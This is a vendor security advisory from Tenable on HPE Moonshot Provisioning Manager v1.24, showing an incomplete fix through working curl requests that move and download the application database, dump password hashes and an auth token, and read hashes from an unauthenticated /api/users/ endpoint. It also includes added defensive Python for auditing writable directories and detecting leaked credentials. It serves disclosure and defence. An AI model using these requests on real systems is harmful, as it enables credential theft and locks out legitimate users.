Synopsis
While developing a Nessus plugin for CVE-2018-7072 and CVE-2018-7073, Tenable discovered that the fix in HPE Moonshot Provisioning Manager v1.24 for HPE advisory HPESBHF03843 is incomplete. In v1.24, /opt/hp/moonshot/upload/ and many other directories are still writable by the user moonshot:
# find / -maxdepth 5 -type d -user moonshot -perm /u+w -printf "%M %u %p \n" 2> /dev/null
drwx------ moonshot /home/moonshot
drwxr-xr-x moonshot /var/lib/moonshot
drwxr-xr-x moonshot /opt/hp/moonshot
drwxr-xr-x moonshot /opt/hp/moonshot/include
drwxr-xr-x moonshot /opt/hp/moonshot/repo
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/switch_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/prov_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/tinkerbell
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/moonshot_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/task_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/upgrade
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/root
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/os_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/user_mgr
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/pydeps
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/conf
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/tclient
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/bin
drwxr-xr-x moonshot /opt/hp/moonshot/tinkerbell/answers
drwxr-xr-x moonshot /opt/hp/moonshot/upload
drwxr-xr-x moonshot /opt/hp/moonshot/logs
drwxr-xr-x moonshot /opt/hp/moonshot/bin
drwxr-xr-x moonshot /opt/hp/moonshot/bin/__pycache__
drwxr-xr-x moonshot /opt/hp/moonshot/lib
drwxr-xr-x moonshot /opt/hp/moonshot/lib/python3.3
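The same audit in Python, as an added example that is not code from the advisory or from HPE: it reproduces the find command above (directories owned by a given user with the owner-write bit set, to a maximum depth) so the result can be diffed between releases or fed into a compliance check. The user name "moonshot" and depth 5 are the advisory's values; the throwaway directory tree used by demo_on_temp_tree() is constructed here.

```python
"""Audit which directories a service account can write to.

Added example, not part of the advisory or of HPE's product. Mirrors
`find / -maxdepth 5 -type d -user moonshot -perm /u+w` in Python.
"""
import os
import pwd
import stat
import tempfile


def writable_dirs_owned_by(root, uid, max_depth=5):
    """Return [(mode, owner, path)] for every directory at most max_depth
    levels below root that is owned by uid and has the owner-write bit set.
    Unreadable subtrees are skipped, like find with 2>/dev/null."""
    root = os.path.abspath(root)
    base_depth = root.rstrip(os.sep).count(os.sep)
    hits = []
    for dirpath, dirnames, _ in os.walk(root):
        depth = dirpath.rstrip(os.sep).count(os.sep) - base_depth
        if depth >= max_depth:
            dirnames[:] = []  # do not descend any further (find -maxdepth)
        try:
            st = os.lstat(dirpath)
        except OSError:
            continue
        if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
            try:
                owner = pwd.getpwuid(st.st_uid).pw_name
            except KeyError:
                owner = str(st.st_uid)
            hits.append((stat.filemode(st.st_mode), owner, dirpath))
    return hits


def audit_user(root="/", user="moonshot", max_depth=5):
    """Resolve the user name, as find -user does, and return the writable
    directories it owns. Defaults are the advisory's values."""
    uid = pwd.getpwnam(user).pw_uid
    return writable_dirs_owned_by(root, uid, max_depth)


def demo_on_temp_tree():
    """Constructed sample tree: 'upload' is mode 755 (owner-writable, like
    /opt/hp/moonshot/upload in the advisory), 'repo' is 555. Returns what
    the audit reports for each and whether max_depth=0 limits the result
    to the root directory itself."""
    with tempfile.TemporaryDirectory() as tmp:
        upload = os.path.join(tmp, "upload")
        repo = os.path.join(tmp, "repo")
        os.mkdir(upload)
        os.chmod(upload, 0o755)
        os.mkdir(repo)
        os.chmod(repo, 0o555)
        me = os.getuid()
        reported = {path for _, _, path in writable_dirs_owned_by(tmp, me)}
        root_only = [p for _, _, p in writable_dirs_owned_by(tmp, me, 0)]
        return {
            "upload": upload in reported,
            "repo": repo in reported,
            "root_only_at_depth_0": root_only == [tmp],
        }


if __name__ == "__main__":
    for mode, owner, path in audit_user():
        print(mode, owner, path)
```

Run as root on the appliance it prints the same list as the find command; the useful comparison is between the output on v1.24 and on whichever release claims to close the advisory, since every directory that stays owner-writable is a candidate for the file move shown below.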
For example, the attacker can move the db.sqlite3 file in /var/lib/moonshot to /opt/hp/moonshot/upload/:
$ curl -kd "isofile.savepath=/var/lib/moonshot/db.sqlite3&isofile.filename=db.sqlite3" https://<mpm_host>/cgi-bin/khuploadfile.cgi
<html>
<body>
<p> File Upload Success <p>
</body>
</html>
Then the attacker can fetch the db.sqlite3 file with:
$ curl -k -o db.sqlite3 'https://<mpm_host>/upload/db.sqlite3'
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 95232 100 95232 0 0 294k 0 --:--:-- --:--:-- --:--:-- 567k
The db.sqlite3 file is the database for the 'tinkerbell' Django project and contains various information about the web application at https://<mpm_host>/. For example, it contains information about configured users and authentication tokens of logged in users:
$ sqlite3 db.sqlite3
SQLite version 3.6.20
Enter ".help" for instructions
Enter SQL statements terminated with a ";"
sqlite> .table
auth_group                  moonshot_mgr_addressrecord
auth_group_permissions      moonshot_mgr_chassis
auth_permission             moonshot_mgr_chassisauthtoken
auth_user                   moonshot_mgr_nic
auth_user_groups            moonshot_mgr_node
auth_user_user_permissions  moonshot_mgr_switch
authtoken_token             os_mgr_configurationfile
django_admin_log            os_mgr_operatingsystem
django_content_type         os_mgr_update
django_migrations           prov_mgr_backup
django_session              prov_mgr_clone
djkombu_message             prov_mgr_install
djkombu_queue               task_mgr_vlanassignmentrecord
sqlite> .header on
sqlite> select * from auth_user;
id|password|is_superuser|username|first_name|last_name|email|is_staff|is_active|date_joined|last_login
1|pbkdf2_sha256$20000$kTvcnCFdQyTE$gmAgQbL6t1YCbkw6qnl+sGg9qKkf8wSQdxC+fhR4fwI=|1|user1|user number 1|||1|1|2018-08-01 22:43:43.292870|2018-08-21 22:28:15.787135
2|pbkdf2_sha256$20000$V0bHk71d7xte$eWxIyHgo75gYMZAWUS07mUVezMtY6Ru8gFb8awJJBoc=|1|user2|user number 2|||1|1|2018-08-21 22:47:59.549245|
sqlite> select * from authtoken_token;
key|created|user_id
e8419331029d8b4d24369cdab9a69b6d97bf3bf0|2018-08-21 22:27:23.451159|1
This information may help the attacker launch further attacks.
Also, because /var/lib/moonshot/db.sqlite3 has been moved to /opt/hp/moonshot/upload/, valid users can no longer log in to the web UI at https://<mpm_host>/.
Tenable also found another security issue with URL endpoint /api/users/, which allows an unauthenticated remote attacker to fetch all user accounts with sensitive information including password hashes:
$ curl -k 'https://<mpm_host>/api/users/'
[{"url":"https:/<mpm_host>/</api/users/1/","username":"user1","first_name":"user number 1","password":"pbkdf2_sha256$20000$kTvcnCFdQyTE$gmAgQbL6t1YCbkw6qnl+sGg9qKkf8wSQdxC+fhR4fwI=","email":"","is_staff":true,"is_active":true,"is_superuser":true,"last_login":"2018-08-21T22:28:15.787135Z","date_joined":"2018-08-01T22:43:43.292870Z"},{"url":"https:///api/users/2/","username":"user2","first_name":"user number 2","password":"pbkdf2_sha256$20000$V0bHk71d7xte$eWxIyHgo75gYMZAWUS07mUVezMtY6Ru8gFb8awJJBoc=","email":"","is_staff":true,"is_active":true,"is_superuser":true,"last_login":null,"date_joined":"2018-08-21T22:47:59.549245Z"}]
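A check a defender can run against the body returned by /api/users/ (or any other user-listing endpoint) to confirm that a fix no longer serialises credentials, as an added example that is not code from the advisory or from HPE. It flags fields by name (password, token, key, ...) and by value shape (the "<algorithm>$..." storage format of Django's password hashers, and the 40-hex-character authtoken keys seen in the authtoken_token table above), and produces the redacted shape a fixed endpoint should return. The sample response is constructed here with fabricated hash strings in the same layout; the host name and hashes are not those from the advisory.

```python
"""Flag credentials leaking through a user-listing API response.

Added example, not code from the advisory or from HPE. Stdlib only.
"""
import json
import re

# Storage prefixes of Django's built-in password hashers ("<algorithm>$...").
DJANGO_HASH_RE = re.compile(
    r"^(pbkdf2_sha256|pbkdf2_sha1|argon2|bcrypt_sha256|bcrypt|sha1|md5)\$"
)
# A Django REST framework authtoken key, as in authtoken_token: 40 hex chars.
HEX_TOKEN_RE = re.compile(r"^[0-9a-f]{40}$")
# Field names that should never appear in a user-listing response.
SENSITIVE_KEYS = {"password", "token", "key", "secret", "auth_token", "api_key"}


def credential_reason(key, value):
    """Return why a (key, value) pair counts as a leaked credential, or None."""
    if key.lower() in SENSITIVE_KEYS:
        return "sensitive field name"
    if isinstance(value, str) and DJANGO_HASH_RE.match(value):
        return "django password hash"
    if isinstance(value, str) and HEX_TOKEN_RE.match(value):
        return "40-hex api token"
    return None


def find_exposed_credentials(payload, path="$"):
    """Walk a decoded JSON value and return [(json_path, key, reason)] for
    every field flagged by credential_reason(). Nested objects and lists are
    descended so the check also works on paginated or wrapped responses."""
    findings = []
    if isinstance(payload, dict):
        for key, value in payload.items():
            here = f"{path}.{key}"
            reason = credential_reason(key, value)
            if reason:
                findings.append((here, key, reason))
            else:
                findings.extend(find_exposed_credentials(value, here))
    elif isinstance(payload, list):
        for i, item in enumerate(payload):
            findings.extend(find_exposed_credentials(item, f"{path}[{i}]"))
    return findings


def redact(payload):
    """Return a copy with every flagged field removed: the representation a
    fixed endpoint should produce (serialise an allow-list of public fields,
    never the model's password column)."""
    if isinstance(payload, dict):
        return {k: redact(v) for k, v in payload.items()
                if credential_reason(k, v) is None}
    if isinstance(payload, list):
        return [redact(v) for v in payload]
    return payload


def audit(body):
    """Decode a response body and return (findings, redacted_copy)."""
    data = json.loads(body)
    return find_exposed_credentials(data), redact(data)


# Constructed sample in the shape of the /api/users/ response above; the
# hash strings are fabricated placeholders with the pbkdf2_sha256 layout.
SAMPLE_RESPONSE = json.dumps([
    {"url": "https://mpm.example/api/users/1/", "username": "user1",
     "first_name": "user number 1",
     "password": "pbkdf2_sha256$20000$SALTSALTSALT$AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
     "email": "", "is_staff": True, "is_active": True, "is_superuser": True,
     "last_login": None},
    {"url": "https://mpm.example/api/users/2/", "username": "user2",
     "first_name": "user number 2",
     "password": "pbkdf2_sha256$20000$SALTSALTSALT$BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB=",
     "email": "", "is_staff": True, "is_active": True, "is_superuser": True,
     "last_login": None},
])

if __name__ == "__main__":
    found, clean = audit(SAMPLE_RESPONSE)
    for json_path, key, reason in found:
        print(f"{json_path}: {reason}")
    print(json.dumps(clean, indent=1))
```

Two things need fixing on the server side for this endpoint, and the check above only confirms the second: the listing must require authentication, and the serializer must enumerate the public fields explicitly rather than exposing the whole user model. Assuming the endpoint is built on Django REST framework (the "url" fields suggest a HyperlinkedModelSerializer, but the advisory does not say), that means a restrictive permission class on the view and a Meta.fields allow-list on the serializer that omits password.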
Solution
No solution exists. Contact HPE for further instructions.
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]